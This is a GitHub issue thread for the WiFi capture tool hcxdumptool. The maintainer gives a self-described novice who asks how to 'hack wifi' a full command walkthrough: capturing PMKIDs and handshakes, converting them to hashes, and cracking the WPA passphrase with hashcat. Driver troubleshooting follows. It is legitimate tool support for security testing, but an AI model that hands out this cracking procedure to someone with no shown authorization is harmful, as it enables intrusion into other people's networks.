ZerBea/hcxdumptool #54: PMKID not found on TP-Link / D-Link router

Beppe1988, 2019-03-21:
Hi to all.
I have a problem with this software. When I try to find PKMID it give me only a Proberequest and a Handshake AP-LESS within 3-4 hours from a TP-LINK/ D-LINK target! Signal strong was -67.

I use this Wifi Card: AWUS036H (RTL8187 Drivers) and +10dB gain antenna

I use this command: `hcxdumptool -o test.pcapng -i wlan0 --filterlist=mac.txt --filtermode=3 -c 6 - --enable_status=3`

anyway without the filter list the software found PKMID of nearest and farest AP except my target! Why?

Thank you for answers.

ZerBea, 2019-03-21:
AP-LESS HANDSHAKE means that hcxdumptool is acting as an access point and requested a M2 EAPOL frame from a client, from which you can recover the password.
Some access points doesn't transmit PMKIDs, because this feature is disabled or not present: https://hashcat.net/forum/thread-7717.html
So, the PMKID attack will not work against them.

BTW:
There is no need to wait 3-4 hours. If the access point use a PMKID, you will retrieve it in less than an minute.

Closed this, because it isn't an issue.

closed 2019-03-21 by ZerBea

harshpatel590, 2020-11-26:
hello ZerBea iam very new to hacking i don't know any thing can u plzz reply how to hack wifi with PMKID from very beginning  coz every tutorial shows old method which doesn't work and have same error PMKID not found or takes very long time to have some output like 20 to 30 mins i request plzz reply how to hack wifi with PMKID from beginning

ZerBea, 2020-11-26:
Not every AP calculate a PMKID not every CLIENT use a PMKID.
Running too much DEAUTHENTICATIONs will destroy APs EAPOL timer. If that happen, PMKIDs and ANONCEs are cleared/zeroed and/or renewed. the values become useless and nonce-error-corrections isn't working any longer.

Some good information/tutorials are here:
https://hashcat.net/forum/thread-7717.html
and here:
https://hashcat.net/forum/thread-6661-page-69.html
(read backwards)

Procedure:
Stop all services that take access to the interface (don't use airmon-ng).
start hcxdumptool and run it 10 minutes
```
$ hcxdumptool -i interface -o capture.pcapng --enable_status=1 --active_beacon --tot=10
```
convert hashes
```
$ hcxpcapngtool -o hash.22000 -E words -I words -U words  capture.pcapng
```
recover PSK.
```
$ hashcat -m 22000 hash.22000 words
```
use other hcxtools to recover the PSK:
```
$ hcxeiutool -i words -s testlist
$ hashcat -m 22000 hash.22000 --increment -a 6 testlist ?d?d?d?d
$ hcxpsktool -c hash.22000 | hashcat -m 22000 hash.22000
```

harshpatel590, 2020-11-26:
it shows this problem

harshpatel590, 2020-11-26:
it shows this problem sorry to disturb  u on this page ::---

failed to transmit internal beacon: Network is down

failed to read packet: Network is down

failed to read packet: Network is down

failed to transmit internal beacon: Network is down
12:49:25     ERROR: 28 [INTERFACE IS NOT ON EXPECTED CHANNEL]
12:49:25     ERROR: 29 [INTERFACE IS NOT ON EXPECTED CHANNEL]
12:49:25     ERROR: 30 [INTERFACE IS NOT ON EXPECTED CHANNEL]
12:49:26     ERROR: 31 [INTERFACE IS NOT ON EXPECTED CHANNEL]
12:49:26     ERROR: 32 [INTERFACE IS NOT ON EXPECTED CHANNEL]
12:49:26     ERROR: 33 [INTERFACE IS NOT ON EXPECTED CHANNEL]
12:49:26     ERROR: 34 [INTERFACE IS NOT ON EXPECTED CHANNEL]

failed to read packet: Network is down
12:49:26     ERROR: 36 [INTERFACE IS NOT ON EXPECTED CHANNEL]
12:49:27     ERROR: 37 [INTERFACE IS NOT ON EXPECTED CHANNEL]
12:49:27     ERROR: 38 [INTERFACE IS NOT ON EXPECTED CHANNEL]
12:49:27     ERROR: 39 [INTERFACE IS NOT ON EXPECTED CHANNEL]
12:49:27     ERROR: 40 [INTERFACE IS NOT ON EXPECTED CHANNEL]
12:49:27     ERROR: 41 [INTERFACE IS NOT ON EXPECTED CHANNEL]
12:49:27     ERROR: 42 [INTERFACE IS NOT ON EXPECTED CHANNEL]
12:49:28     ERROR: 43 [INTERFACE IS NOT ON EXPECTED CHANNEL]

maximum number of errors is reached

terminating...

ZerBea, 2020-11-26:
This error message means that there is another tool, that take access to the interface and switches the channel.
Please comment your command lines that you use.

ZerBea, 2020-11-26:
BTW:
You don't disturb me. This is hcxdumptool issue tracker.

harshpatel590, 2020-11-26:
hcxdumptool -i wlan1 -o capture.pcapng --enable_status=1 --active_beacon
--tot=10

ZerBea, 2020-11-26:
Also please comment output of:
```
$ hcxdumptool -I
$ hcxdumptool -i interface --check_driver
$ hcxdumptool -i interface --check_injection
```

harshpatel590, 2020-11-26:
can u plzz tell me how to write interface

ZerBea, 2020-11-26:
interface is the name of your wlan interface, e.q.:
```
$ hcxdumptool -I
$ hcxdumptool -i wlan1 --check_driver
$ hcxdumptool -i wlan1 --check_injection
```

That was a race condition. While I answered, you commented your commandline.

harshpatel590, 2020-11-26:
iam really sorry iam newbe and trying to learn very hard

ZerBea, 2020-11-26:
No problem.

harshpatel590, 2020-11-26:
everything is working for adapter

ZerBea, 2020-11-26:
Please comment what hcxdumptool is showing on all three command lines.

harshpatel590, 2020-11-26:
# hcxdumptool -I
wlan interfaces:
c48e8f27bdad wlan0 (rtl8723be)
1cbfce18a29a wlan1 (rt2800usb)

# hcxdumptool -i wlan1 --check_driver
initialization...
starting driver test...
warning: NetworkManager is running with pid 1363
 (possible interfering hcxdumptool)
warning: wpa_supplicant is running with pid 1484
 (possible interfering hcxdumptool)
driver tests passed...
all required ioctl() system calls are supported by driver
terminating...

# hcxdumptool -i wlan1  --check_injection
initialization...
warning: NetworkManager is running with pid 1363
 (possible interfering hcxdumptool)
warning: wpa_supplicant is running with pid 1484
 (possible interfering hcxdumptool)
starting packet injection test (that can take up to two minutes)...
packet injection is working!
ratio: 34 to 15
terminating...

ZerBea, 2020-11-26:
Ok, thanks.
Now we know what caused the trouble:
```
warning: NetworkManager is running with pid 1363
 (possible interfering hcxdumptool)
warning: wpa_supplicant is running with pid 1484
 (possible interfering hcxdumptool)
```

This tools take access to the interface and switch channels. You have to stop the services before running hcxdumptool
```
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service
```
Than run hcxdumptool again:
```
$ hcxdumptool -i wlan1  --check_injection
```
No warning should appear.

When finished, you should restart the services again. Otherwise you will not get a WiFi connection:
```
sudo systemctl start NetworkManager.service
sudo systemctl start wpa_supplicant.service
```

harshpatel590, 2020-11-26:
ok after stoping services i didn't get any errors

ZerBea, 2020-11-26:
That sounds good. Now everything should work.
Now hcxdumptool has full control and NetworkManager doesn't switch channels any longer.

ZerBea, 2020-11-26:
Please read this. too:
https://hashcat.net/forum/thread-9639-post-50750.html#pid50750

harshpatel590, 2020-11-26:
should i run this
cxdumptool -i wlan1 -o capture.pcapng --enable_status=1 --active_beacon
--tot=10

after stoping services or after starting

when i run hcxdumptool after starting services it shows error again

warning: NetworkManager is running with pid 6258
 (possible interfering hcxdumptool)
warning: wpa_supplicant is running with pid 6270
 (possible interfering hcxdumptool)

ZerBea, 2020-11-26:
First stop services.
Than run hcxdumptool.
When finished, restart services - other wise you will not be able to connect to your router.

ZerBea, 2020-11-26:
From hcxdumptool --help:
```
$ hcxdumptool --help
hcxdumptool 6.1.3-28-gbe62c5c  (C) 2020 ZeroBeat
usage  : hcxdumptool <options>
         press ctrl+c to terminate hcxdumptool
         press GPIO button to terminate hcxdumptool
         hardware modification is necessary, read more:
         https://github.com/ZerBea/hcxdumptool/tree/master/docs
         do not run hcxdumptool on logical (NETLINK) interfaces (monx, wlanxmon)
         do not use hcxdumptool in combination with 3rd party tools, which take access to the interface (except: tshark, wireshark, tcpdump)
```
NetworkManager and wpa_supplicant belong to the 3rd party tools that take access to the device.

harshpatel590, 2020-11-26:
it still says [INTERFACE IS NOT ON EXPECTED CHANNEL] after switching
services on

ZerBea, 2020-11-26:
Yes, for sure.
If that services are running, hcxdumptool is not able to control the channels. That result in an error if hcxdumptool want to set channel 1, while NetworkManger what to set channel 6.
So you must stop this services before(!) running hcxdumptool.

harshpatel590, 2020-11-26:
but u said that if i didn't start service it will not able to connect to
router

ZerBea, 2020-11-26:
Correct.
You only have one WiFi device (your USB adapter).
Either you can use the device to connect to your router and to use internet.
Or you can use the device to run attacks (hcxdumptool).
You can't do both at the same time.

So if you would run attacks (hcxdumptool), you must stop all services.
If you want to connect to the router (internet), you must start the services.

ZerBea, 2020-11-26:
Or in other words:
For regular operation (surfing in internet) -> NetworkManager control the device and let you connect to your router
For attack vector -> hcxdudmptool control the device.

harshpatel590, 2020-11-26:
ok bro i got it

ZerBea, 2020-11-26:
Glad to hear that.
Unfortunately the whole stuff isn't easy to understand. It starts with the hardware of the device, continues with the driver and the configuration of the operating system (Linux) and ends with 802.11 protocol family. That include basic knowledge of high frequency technology as well as radio wave propagation.

harshpatel590, 2020-11-26:
thanks bro very very much

ZerBea, 2020-11-26:
You're welcome.

harshpatel590, 2020-11-26:
after getting hases i got this

harshpatel590, 2020-12-03:
hello bro i want your help can we talk on your email

ZerBea, 2020-12-03:
Yes, just send me a mail I can reply on.
You can get my email address via git API.

harshpatel590, 2020-12-03:
iam not able to see you email plzz send any massage to me via your email i
am having problem related to python

ZerBea, 2020-12-03:
There is a how-to to get the email address:
https://www.sourcecon.com/how-to-find-almost-any-github-users-email-address/
using git API:
https://api.github.com/users/ZerBea/events/public

BTW:
I'm an ASM/C coder and have no experience with python. I don't use python, so I can't help you.